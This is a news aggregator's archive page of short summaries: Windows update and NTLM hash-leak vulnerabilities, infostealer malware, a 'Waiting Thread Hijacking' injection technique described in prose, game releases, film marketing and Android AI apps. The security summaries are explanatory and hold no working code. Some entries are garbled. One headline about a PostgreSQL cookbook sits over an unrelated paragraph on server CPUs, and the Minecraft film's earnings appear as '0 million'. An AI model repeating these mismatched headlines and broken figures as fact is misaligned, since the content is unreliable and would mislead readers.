research Archives

Winsage

April 23, 2025

Critical Flaw in Windows Update Stack Enables Code Execution and Privilege Escalation

A newly identified vulnerability in the Windows Update Stack, designated as CVE-2025-21204, allows attackers to execute arbitrary code and escalate privileges to SYSTEM level on affected machines. This critical security flaw arises from improper privilege separation and inadequate validation during the update orchestration process. Attackers can exploit it by creating harmful update packages or acting as man-in-the-middle on compromised networks. The vulnerability impacts any Windows system utilizing the vulnerable update mechanism, affecting both enterprise and consumer editions. Microsoft is working on a patch, and users are advised to monitor official channels for updates and apply patches promptly. Organizations should also restrict network access to update servers and monitor for suspicious update activities. The CVSS score for this vulnerability is 7.8 (High), indicating significant risk.

Tech Optimizer

April 21, 2025

PostgreSQL 12 High Availability Cookbook

The server-class CPU market is primarily dominated by AMD and Intel, both of which offer dedicated lines of CPUs for server applications. AMD's Threadripper chips are strong competitors to Intel's Xeon processors, with AMD often providing higher core counts that enhance performance for multi-threaded applications. The price-to-performance ratios of both manufacturers are relatively comparable, but each has unique strengths. Prospective buyers are encouraged to research using resources like AnandTech, Tom's Hardware, and the official sites of Intel and AMD for benchmarks and comparative analyses.

AppWizard

April 19, 2025

Gloomwood’s research update transforms it from Thief with guns into Dishonored with mutations, letting you inject dissected monster juice into yourself to gain their powers

Players speculate that the protagonist of Gloomwood may be named 'Jekyll' following the recent Research update. This update introduces a new laboratory setting where players can synthesize a cure for a plague and conduct ethically ambiguous research to create serums that allow transformation into monstrous forms. These serums enable players to blend in with hostile creatures for stealth advantages. The update expands gameplay possibilities, moving away from the initial concept of a 'Thief with guns' towards abilities reminiscent of those in Dishonored, though the abilities are one-time-use rather than permanent. The doctor's journal has been enhanced with new artwork, soundscapes, and animations. Players will access the research mechanics upon reaching the game's mirror realm, with future updates expected to roll out in the summer months.

Tech Optimizer

April 18, 2025

Breached Identities and Infostealers: One of the Largest Ongoing Data Leak in History

Breached identities due to infostealer malware are a significant threat to corporate information security in 2024. Infostealers are a type of remote access trojan that exfiltrate sensitive data, including saved credentials, session cookies, browser history, crypto wallet information, screen captures, and host data. Infections often stem from downloading cracked software, malicious advertising, fake Windows updates, and repackaged games. Infostealers do not require local administrative privileges, making them easy to execute. Threat actors primarily aim to profit from breached bank accounts and crypto wallets, often bypassing multi-factor authentication by targeting session cookies. They also seek credentials for subscription services and corporate access. Research shows that 90% of breached companies had leaked corporate credentials in a stealer log, with 78% experiencing leaks within six months of a breach. In comparison, 76% of similar companies without breaches had experienced a corporate stealer log compromise. The investigation identified high-criticality credentials from various corporate applications, indicating that a single user often has access to multiple credentials. The rise of infostealer malware represents a broad threat, encompassing a wide range of sensitive data. Organizations are advised to implement strategies such as restricting download privileges, avoiding illegal content, disabling macros, and regularly updating software to mitigate risks associated with infostealer malware.

AppWizard

April 18, 2025

PC is the definitive way to play The Last of Us Part 2 Remastered

Sony's exclusives on PlayStation hardware are known for their seamless performance, but PC ports can vary in quality. The Last of Us Part 2 Remastered has been released on PC, offering a polished experience and various customizable graphics settings, including level of detail, texture quality, shadow quality, NVIDIA Reflex Low Latency, AMD Anti-Lag 2, and upscaling technologies like NVIDIA DLSS, AMD FSR, and Intel XeSS. While the gameplay experience is generally smooth, some minor graphical glitches may occur. The game has received patches since launch to improve performance. It retains a stunning aesthetic, enhanced by modern PC capabilities, making it a worthwhile investment for both newcomers and those who have played it on PS4 or PS5. Players are encouraged to check their system's specifications to ensure compatibility for an optimal experience.

AppWizard

April 18, 2025

Marketing ‘A Minecraft Movie’: “blockifying’ the world” and …

Warner Bros. Pictures' marketing strategy for A Minecraft Movie focused on engaging the existing fan base and appealing to younger audiences. The campaign included interactive social media experiences, tactile billboards, and cast appearances at gaming events. The film grossed 0 million globally and over 0 million in North America within two weeks of release. The marketing involved collaborations with brands like McDonald's and Adidas, targeting Generation Z, which made up 64% of the audience during the opening weekend. Local-language influencers voiced characters in dubbed versions, and the campaign adapted based on audience feedback. The world premiere occurred in London on March 30, followed by a premiere in Mexico on April 3, generating significant excitement and engagement.

Winsage

April 17, 2025

Windows NTLM hash leak flaw exploited in phishing attacks on governments

A vulnerability in Windows, identified as CVE-2025-24054, is being actively exploited in phishing campaigns targeting government and private sectors. Initially addressed in Microsoft's March 2025 Patch Tuesday, it was not considered actively exploited at that time. Researchers from Check Point reported increased exploitation activities shortly after the patches were released, particularly between March 20 and 25, 2025. Some attacks were linked to the Russian state-sponsored group APT28, but definitive attribution is lacking. The vulnerability allows attackers to capture NTLM hashes through phishing emails containing manipulated .library-ms files that trigger the flaw when interacted with. Check Point noted that subsequent attacks involved .library-ms files sent directly, requiring minimal user interaction to exploit. The malicious files also included additional components that exploit older vulnerabilities related to NTLM hash leaks. The attacker-controlled SMB servers were traced to specific IP addresses. Although rated as medium severity, the potential for authentication bypass and privilege escalation makes it a significant concern, prompting recommendations for organizations to install updates and disable NTLM authentication if not necessary.

Winsage

April 17, 2025

Hackers Exploiting NTLM Spoofing Vulnerability in Wild to Compromise Systems

Cybercriminals are exploiting a vulnerability in Windows systems known as CVE-2025-24054, which involves NTLM hash disclosure through spoofing techniques. This flaw allows attackers to leak NTLM hashes, leading to privilege escalation and lateral movement within networks. It is triggered when a user extracts a ZIP archive containing a malicious .library-ms file, causing Windows Explorer to initiate SMB authentication requests that expose NTLMv2-SSP hashes. Exploitation of this vulnerability began shortly after a security patch was released on March 11, 2025, with campaigns targeting government and private institutions in Poland and Romania. These campaigns utilized spear-phishing emails containing malicious ZIP archives, which, when interacted with, leaked NTLM hashes. The malicious files included various types designed to initiate SMB connections to attacker-controlled servers, allowing for pass-the-hash attacks and privilege escalation. The stolen hashes were sent to servers in several countries, indicating potential links to state-sponsored groups. One campaign involved Dropbox links that exploited the vulnerability upon user interaction. Microsoft has recommended immediate patching, enhancing network defenses, user education, network segmentation, and regular security audits to mitigate risks associated with this vulnerability.

Tech Optimizer

April 15, 2025

New ‘Waiting Thread Hijacking’ Malware Technique Evades Modern Security Measures

Security researchers have developed a new malware process injection technique called "Waiting Thread Hijacking" (WTH), which executes harmful code within legitimate processes while avoiding detection by security measures. This method improves upon traditional Thread Execution Hijacking by using a different sequence of operations that bypasses commonly monitored API calls. WTH involves allocating memory and injecting malicious payloads using standard functions, identifying dormant threads within the target process, acquiring thread context with less suspicious permissions, and overwriting the return address on the stack with the injected shellcode. The technique ensures stability by preserving the original state of the thread and allows it to resume normal operations after executing the malicious code. Additionally, WTH employs an obfuscation technique that distributes its steps across multiple child processes to evade behavioral detection systems. While WTH can avoid many conventional detection triggers, it is not completely immune, as some Endpoint Detection and Response (EDR) solutions can block unauthorized memory writes. Check Point Research has observed that WTH is effective against certain EDRs while others can block it but not older methods, illustrating the variability in EDR capabilities.

AppWizard

April 15, 2025

My 5 favorite AI apps on Android right now – and how I use them

AI has integrated into daily life, especially for Android users due to Google's embedding of AI capabilities in the operating system. Key AI apps for Android include: 1. Google Gemini: The default AI app that enhances user experience without installation. It features Gemini Live for complex queries and can be used as a handy assistant. 2. Perplexity: An AI-driven query app with an intuitive interface for news summaries and organizing queries. It is free and serves as a default search engine for some users. 3. DeepSeek: An AI development firm from China offering two apps on Google Play: Deep Think (AI chatbot) and DeepSeek (AI assistant), which handles deep queries and basic searches. It is free but requires account registration. 4. Microsoft Copilot: A versatile AI tool for standard queries, drafting, and image creation. It summarizes news and requires a Microsoft account for access. 5. Opera's Aria: An AI tool integrated into the Opera browser, offering standard query capabilities and voice-to-text functionality. It requires installation but is free to use without a subscription.